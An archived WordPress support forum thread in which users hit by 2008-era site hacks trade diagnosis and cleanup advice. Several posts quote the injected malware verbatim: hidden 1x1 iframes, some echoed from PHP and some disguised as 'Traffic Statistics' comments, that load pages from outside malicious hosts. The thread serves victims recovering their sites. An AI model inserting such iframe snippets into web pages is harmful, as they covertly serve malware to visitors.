WordPress.org

Ready to get started?Download WordPress

Forums

WordPress 2.5 Hacked (31 posts)

  1. muskogeerabbit
    Member
    Posted 6 years ago #

    I recently upgraded to 2.5 and this morning had my site hacked redirecting all readers to cdpuvhfzz.com. I am now trying to figure out the easiest way to recover. Any suggestions would be appreciated.

    Don Ray
    [sig moderated]

  2. sabinou
    Member
    Posted 6 years ago #

    Don, the easiest way to redirect stuff is to edit your .htaccess file : has it been modified ?
    Next, you can use a program like flashget to download the supposed entry page of your blog, see if it downloads something containing an iframe.
    Next, download all html files to your harddisk and search the string cdpuvhfzz to see if it may be present in one of your hacked files.

    And of course, change all your passwords, don't note them in places easy to see, etcetera...

  3. muskogeerabbit
    Member
    Posted 6 years ago #

    Hi Sabinou. I will try what you suggest. My ,htaccess has not been touched, but I don't think my host used that any more. I remember they made a change to avoid using .htaccess

  4. JHouse
    Member
    Posted 6 years ago #

    If all else fails, ask your host to restore your site to the earliest backup. This, however, may pose a problem if you added a bunch of stuff to your site within the last couple days, yet their most recent backup is from last week.

    Good luck.

  5. muskogeerabbit
    Member
    Posted 6 years ago #

    Can anyone tell me if it is normal for the index.php module, in wp-content, to contain an iframe statement when a site is up and running? I know it doesn't in the initial library. In other words, does WordPress use iframe itself?

  6. muskogeerabbit
    Member
    Posted 6 years ago #

    As with my question above, would the same iframe statement be in wp-config.php?

  7. lomes
    Member
    Posted 6 years ago #

    The actual PHP file wp-content/index.php looks to simply be there to disallow directory browsing. The contents of this file (at least in 2.5) is simply:

    <?php
    // Silence is golden.
    ?>

    So there should be nothing else in that file...

    When I acutally browse there in a web browser, it outputs the following HTML:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML><HEAD>
    <META http-equiv=Content-Type content="text/html; charset=windows-1252"></HEAD>
    <BODY></BODY></HTML>
  8. lomes
    Member
    Posted 6 years ago #

    No. It sounds like someone has been playing with your files...

  9. lomes
    Member
    Posted 6 years ago #

    If you haven't done much customization (or even if you have), you might want to download the version of the files on your webhost to your local machine. Then compare them to the local copy you had actually uploaded to the web host (you do have that right?). If you don't, you can just download the WP2.5 zip again and extract it somewhere to compare.

    I'd suggest using something like http://winmerge.org/ (free) and just do a full directory compare. Then you'll know if and what files have been changed from what WP delivers. If YOU didn't make those changes... well there ya go.

  10. muskogeerabbit
    Member
    Posted 6 years ago #

    I have the originial files for WP 2.5 and uploaded them to my host site. However, these two files are requested to be left alone during an upgrade and that is why I am asking the question.

    I downloaded these from my host to see what they looked like and bothe containe something like the following:

    <iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?><?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>

  11. muskogeerabbit
    Member
    Posted 6 years ago #

    Aha. That displays different in the post than what it looked like. That is the problem!

  12. vieraman
    Member
    Posted 6 years ago #

    I just had this happen to my website and it's horrible. My sites are hosted at godaddy.com and this happened before but the redirect was something as ugly. I called godaddy about this and simply put it off spending no time at all to research this problem. I ended up having to shut down 7 websites that were all experiencing the hacked code. It was some kind of trojan that collected data. I had thought the bad hack came from a malicous russian programmer..hmm but i don't know still what the problem is. i have godaddy studying this problem again. we'll see how great the security team is over there and will keep everyone posted as to what the heck this thing actually is...

  13. Galeth
    Member
    Posted 6 years ago #

    Two days ago my web suffered the same attack i'm praising for not to recieve any other...

    Is there any solution?

  14. bobsie
    Member
    Posted 6 years ago #

    Experienced a similar problem.

    Four different WordPress installations all on the same web space have been infected. Php files contain inserted malicious code in the form of an iframe. Perhaps other insertions as well?

    The result is that various bits of functionality no longer work in the WordPress CMS, for example text editor tool bars, upload bar, etc. One of the WordPress sites isn't even viewable from the front anymore!
    Desperately in need of a plugin that will rip out the malicious code?!
    Otherwise I'm going to have to download all the websites, strip out the malicious code by hand -- which will take about eight years -- then upload them again! (My web host doesn't have backups of the files.)
    Can anyone help? A plugin? A script to replace the malicious code inserted in the name of cdpuvbhfzz.com?

    cdpuvbhfzz.com or whoever wrote this hack - you are the scum of the earth.

  15. greyko
    Member
    Posted 6 years ago #

    I stumbled across this on my website after I found google was saying my site may harm my computer.
    My internet is a bit slow at the moment so got a friend to have a poke around and she found a virus being blocked from the above site. She only had this happen in IE though?
    It gave me something to search on anyhow, and I came across this thread.

    I ditched wordpress hoping that would fix it, but I found it had infected every php and html document on my website. I noticed that they had a different date to the rest of the files, so once I had that date I could track the infected files.
    I wiped my coppermine gallery (too much to try to fix) and replaced all the html files with those on my hard drive.
    Not sure if it's fixed the problem, might have to start fresh.

  16. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    A lot of the time, these hacks are the result of bad permissions on files, allowing other users on the shared servers to write to them.

    Remember, you're sharing a system with 60-80 other sites. If any of them gets hacked, you can be attacked through there as well.

    Permissions are important. Read more on how to harden your setup here:
    http://codex.wordpress.org/Hardening_WordPress

  17. theqkash
    Member
    Posted 6 years ago #

    Just remove the iframe code from end of file wp-config.php and files of your templates. I have just dome it.

  18. pamQ
    Member
    Posted 6 years ago #

    This has been traced at the Coppermine Photo Gallery forums as an exploit. See this link: http://forum.coppermine-gallery.net/index.php/topic,51671.0.html

    Do you have Coppermine installed on your websites? Or are you purely on WP?

    Our site has been hacked as well. I don't have access to the files, though. We'll have to wait until our webmaster gets on.

    And yes, the little iframes would redirect IE users to some trojans, I believe.

  19. ravetildon
    Member
    Posted 6 years ago #

    Appears I had something similar happen to mine:

    Thus put in an iframe in one of my pages:

    '<!-- Traffic Statistics --> <iframe
    src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->'

    More details here:

    http://wordpress.org/support/topic/170138

  20. mccormicky
    Member
    Posted 6 years ago #

    @ravetildon, I had that exact iframe in a site using an older version of WP 2.2.1 or 2.2.2 which had a security error that allowed access to xmlrpc.php. The iframe code was in a page and a post--in this case a draft of a post---I deleted the codes but then came back to the site and found that the entire directory of wp-admin had been moved into the themes folder. I've since upgraded to 2.5.

    So check your directories for files and folders you didn't create.
    It's my opinion that the other folks in this thread who had this happen to WP 2.5 were hacked before they upgraded but just didn't notice so it looked like they were hacked even with version 2.5.
    Just a theory.
    @muskogeerabbit: if you don't use the default or classic themes in wp-content/ you can also delete wp-content/ and upload a fresh copy along with wp-admin/ and wp-includes/
    The only file you need to leave is config.php because that contains your database connection.Though you might want to paste in the line for the secret key because it isn't in older versions of WP config.php.

    I hope your site is healthy again!

  21. ravetildon
    Member
    Posted 6 years ago #

    My site did get hacked from the older version you mentioned. So I guess I missed the files...

  22. D4W50N
    Member
    Posted 6 years ago #

    They know the IP address of a person who is doing redirecting or hacking wordpress, what will happen to him? What will happen to the person of the IP 61.155.8.157 which is in Beijing, China?

  23. tmosprmo
    Member
    Posted 6 years ago #

    I got hacked too, apparently last night. have busy hi-profile site with 1000 visits per day. was on wp 2.5, which i had upgraded to a couple weeks ago. after hacking, just changed all passwords and deleted all old accounts. theme files i checked all appear okay, but hacker has made strange simple html file appear - with only one line that writes text referring to other website. only subset of wp database appears to have been hacked. main index file is still displaying correctly, but all 2000 posts appear in subdirectory which is now displaying hacker's text.

  24. tmosprmo
    Member
    Posted 6 years ago #

    hacker was ZoRRoKiN, message posted on our site was:

    ZoRRoKiN - Ottoman-Empire.OrG

  25. andy2mary
    Member
    Posted 6 years ago #

    I found the following code in three of my blog postings:

    <!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

    I have deleted this code, blocked the subnet 61.155.8.xxx and changed my admin password.

  26. clivesgt
    Member
    Posted 6 years ago #

    hi
    i've been hacked a few times. i keep hoping that by updating to the latest version of wordpress will solve my problems but it doesn't. then i realised that the hacker had installed malicious code on my server after hacking my site, way back. all i was doing when i updated was updating the wordpress files but the malicious code was always still there so the hacker had an open door all the time, even though i had the latest version of wordpress running. i also realised that they had managed to somehow install code on my server which enabled them to send out spam email, some even using my email address as the sender! so beware, don't be fooled into thinking that by updating to the latest version of wordpress, that your site is secure. you can read about my experiences here

    regards

    clive

  27. Anonymous
    Unregistered
    Posted 6 years ago #

    The culprit is not word-press, it is the poster. I had this happen to me and it was a malware on the computer I used to post the item. I know because it appeared only on the post I made through that computer.

  28. simoncpage2
    Member
    Posted 6 years ago #

    damn it same happened to me - only one posting was affected and it was one I wrote last week and left as a draft till yesterday.

    Any idea exactly how this happens? Server vunerability? Not convinced hack41 that its to do with malware - I tried adding 2 test post from both machines I would use to update the blog and neither came up with any malicious code.

    Since then I have removed unused plugins, made sure to updated all the ones I was using, reset password and user of the admin, turned of trackbacks and written to my hosting company to ask them what is going on. I will let you know what they say...if it is of interest.

    I suspect this is probably a permissions problem?...

  29. rawalex
    Member
    Posted 6 years ago #

    Here is something to look at: I suspect you will find that wordpress is not at fault, because wordpress never has issues like this! (yeah right).

    Meanwhile, check the following: Do you allow other users to make posts? Comments? Are you using the wordpress upload for images? Have you perhaps opened that directory up? Are you using a downloaded theme? Are any of your theme directories open (such that you could edit the files from the admin, example?).

    There are plenty of ways to insert that type of hack. For the most part, those are coming in via XMLRPC style edit attacks. If you are using 2.5 and not 2.5.1, you should upgrade.

  30. 5starunited
    Member
    Posted 5 years ago #

    I just finished updating my site and installed a couple new pluginns and now i get a redirect... I can no longer get to the admin screen to remove modules... Who moderates modules?

Topic Closed

This topic has been closed to new replies.

About this Topic